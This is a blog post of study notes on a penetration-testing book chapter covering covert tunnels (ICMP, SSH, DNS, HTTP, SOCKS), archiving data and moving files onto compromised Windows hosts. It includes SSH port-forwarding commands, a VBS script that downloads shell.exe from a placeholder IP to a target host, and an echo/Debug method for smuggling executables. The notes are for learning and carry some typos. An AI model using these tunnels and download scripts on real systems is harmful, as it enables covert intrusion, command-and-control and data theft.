"Intranet Security Attack and Defense: A Practical Guide to Penetration Testing" Reading Notes (3): Hidden Communication Tunnel Technology

foreword

This article continues to read and learn "Intranet Security Attack and Defense: Penetration Testing Practical Guide", which is the third chapter of hidden communication tunnel technology, which introduces in detail the use of IPv6 tunnels, ICMP tunnels, HTTPS tunnels, SSH tunnels, DNS tunnels and other encrypted tunnels. And explain the common SOCKS proxy tools and intranet upload/download methods

Relevant knowledge has also been studied and sorted out before, see: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning

1. Basic knowledge

1 Overview

The network hidden communication tunnel is the main tool for information transfer with the target host

When a large number of TCP and UDP communications are intercepted by defense systems, protocols that are difficult to disable such as DNS and ICMP have been exploited by attackers and become the main channel for attackers to control tunnels

Commonly used tunnels:

• Network layer: IPv6 tunnel, ICMP tunnel, GRE tunnel
• Transport layer: TCP tunnel, UDP tunnel, regular port forwarding
• Application layer: SSH tunnel, HTTP tunnel, HTTPS tunnel, DNS tunnel

2. Determine the connectivity of the intranet

The judgment method is as follows:

//ICMP协议
ping www.baidu.com

//TCP协议
nc -zv 192.168.1.10 80

//HTTP协议
curl www.baidu.com:80
//curl的代理模式
curl -x proxy-ip:port www.baidu.com

//DNS协议
//windows下的nslookup
mslookup www.baidu.com vps-ip
//linux下的dig
dig @vps-ip www.baidu.com

2. Network Layer Tunneling Technology

1. IPv6 tunnel

An IPv6 tunnel can use IPv4 as a tunnel carrier and encapsulate the entire IPv6 packet in an IPv4 data packet.

Several tools:

• shocked
• 6tunnel
• nt6tunnel

2. ICMP tunnel

In a general communication protocol, if two devices want to communicate, an open port is definitely required, but it is not required under the ICMP protocol.

See also: Intranet penetration series: ICMP tunnel of intranet tunnel

3. Transport Layer Tunneling Technology

Mainly TCP tunnels, UDP tunnels and regular port forwarding, most of which will be blocked

Tools can be found in: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning

4. Application Layer Tunneling Technology

1. SSH tunnel

Almost all Linux/UNIX servers and network devices support the SSH protocol. The SSH protocol is allowed to pass through firewalls and border devices, so it is often exploited by attackers

//本地转发
ssh -CfNg -L 1153（VPS端口）:1.1.1.10（目标IP）:3389（目标端口）
[email protected]（跳板机）

//远程转发
ssh -CfNg -R 3307（VPS端口）:1.1.1.10（目标IP）:3389（目标端口）
[email protected]

-L local port forwarding, -R remote port forwarding, -D dynamic forwarding (SOCKS proxy)**

defense:

• IP whitelist
• ACL restrict request IP
• Set up the system to use out-of-band management entirely

2. HTTP/HTTPS tunnel

reGeorg, meterpreter, tunna, etc. are all famous

3. DNS tunnel

DNS is an essential service, and DNS packets have the ability to penetrate firewalls.

From the point of view of the DNS protocol, it is only to query a specific domain name again and again and get the resolution result, but the essential problem is that the expected return result should be an IP address, but the actual return is an arbitrary string, including encrypted C2 instruction.

The essence of DNS tunneling is to encapsulate other protocols in the DNS protocol for transmission.

See: Intranet Penetration Series: DNS Tunnel of Intranet Tunnel

5. SOCKS proxy

SOCKS is short for "SOCKetS"

• SOCKS4 only supports TCP protocol
• SOCKS5 not only supports TCP/UDP protocol, but also supports various authentication mechanisms

The SOCKS proxy is at the lower level and is at the session layer; while the HTTP proxy is at the application layer. Therefore, a SOCKS proxy can proxy all client connections, while an HTTP proxy can only proxy clients that use the HTTP protocol. SOCKS proxies are faster because they are lower-level and don't need to deal with the details of higher-level protocols.

SOCKET is called "socket", which is used to describe IP address and port. It is a handle of a communication chain and can be used to realize communication between different computers. Its essence is a programming interface (API), which is a IP encapsulation. SOCKS is a proxy protocol. The latest version is SOCKS5. The so-called proxy means that you can access the network indirectly through it, which is equivalent to a transit station. Difference: SOCKET is an API, a tool that allows you to establish network connections. SOCKS is a protocol, a set of data structures.

At present, there are four main VPN tunneling protocols: the point-to-point tunneling protocol PPTP, the second layer tunneling protocol L2TP, the network layer tunneling protocol IPSec and the SOCKS v5 protocol. Among them, PPTP and L2TP work at the data link layer, IPSec works at the network layer, and SOCKS v5 works at the session layer.

eg EarthWorm (ew, new version Termite), reGeorg, sSocks, SocksCap64 (SSTap), Proxifier, ProxyChains

6. Compressed data

1、rar.exe

Package all the contents in the E:\webs\ directory into 1.rar and put it in the E:\webs\ directory

rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\

Extract E:\webs\1.rar to the current root directory

rar.exe e E:\webs\1.rar

Compress all files and folders in the API directory of the E disk by volume, and set each volume to 20M

rar.exe a -m0 -r -v20m E:\test.rar E:\API

Unzip E:\test.part01.rar to the x1 directory of the E drive

rar.exe x E:\test.part01.rar E:\x1

2、7-zip

Package all the content in the E:\webs\ directory into 1.7z and put it in the E:\webs\ directory

7z.exe a -k -r -p12345 E:\webs\1.7z E:\webs\

Unzip E:\webs\1.7z to the current root directory

7z.exe e -p12345 E:\webs\1.7z

Compress all files and folders in the API directory of the E disk by volume, and set each volume to 20M

7z.exe -r -vlm -padmin a E:\test.7z E:\API

Unzip E:\test.part01.7z to the x1 directory of the E drive

7z.exe x -padmin E:\test.7z.001 -oE:\x1

Seven, upload and download

1、VBS

Execute the following command to download the shell.exe file on the target host

Cscript download.vbs

download.vbs code:

Set Post=CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")
post.Open "GET","http://IP/shell.exe",0
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(post.responseBody)
aGet.SaveToFile "C:\test\shell.exe",2

2. Debug upload

First convert the EXE file to be uploaded into the form of hexadecimal HEX, then write the HEX code to the file through the echo command, and finally use the Debug function to compile and restore the HEX code to an EXE file

In KaliLlnux, the exe2bat.exe tool is located in the /usr/share/windows-binaries directory, execute

wine exe2bat.exe ew.exe ew.txt

Convert ew.exe to ew.txt

Then, use the Debug function of the target server to restore the HEX code to an EXE file,
and then use the echo command to copy the code in ew.txt to the command line environment of the target system

3. Other

You can also upload files with these:

• Nishang: Use Nishang to convert the uploaded EXE file to hexadecimal form, then use the echo command to access the target server, and finally use the Download_Execute script to download the text file and convert it to an EXE file
• bitsadmm: Recommended for use on Windows7 and Windows8 hosts, note that it does not support HTTPS and FTP protocols, nor does it support WindowsXP/Sever2003 and earlier versions
• PowerShellDownload

Epilogue

This chapter is mainly about hidden communication tunnels. Since this part of knowledge has been learned before, it will not be recorded in detail here. For details, see other related articles on the blog.